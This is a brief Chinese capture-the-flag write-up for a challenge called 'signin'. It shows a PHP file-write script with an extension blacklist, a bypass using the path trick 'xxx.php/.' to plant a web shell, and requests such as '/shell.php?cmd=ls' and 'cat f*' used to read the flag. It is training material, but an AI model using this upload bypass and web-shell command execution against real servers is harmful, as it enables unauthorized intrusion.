signin--WP
# signin```php
<?php
highlight_file(__FILE__);
$filename = $_POST['filename'];
$data = $_POST['data'];
$black_list = ['php', 'php3', 'php4', 'php5', 'phtml', 'pht','ini','htaccess'];
if (!empty ($filename)){
if(!in_array(pathinfo($filename, PATHINFO_EXTENSION), $black_list, true)) {
file_put_contents($filename, $data);
}
}else{
echo "Welcome bro.";
} Welcome bro.
```
打开题目看到源码看到
```php
$black_list = ['php', 'php3', 'php4', 'php5', 'phtml', 'pht','ini','htaccess'];
```
发现有很多常用的后缀都被过滤了。
看到**pathinfo**函数,上网查找发现有相关的漏洞。
我们可以使用xxx.php/.来进行绕过
写入文件
![](./data/attachment/forum/202303/17/225935xavfus26p2pykt8z.png)
进行访问并使用cmd参数
/shell.php?cmd=ls
![](./data/attachment/forum/202303/17/225943cu9abqrr1abraz19.png)
然后/shell.php?cmd=cat f*,发现页面没有,打开F12发现在源码里面。
![](./data/attachment/forum/202303/17/225949ilmt9p6f2cfmt6l5.png)
得到flag
页:
[1]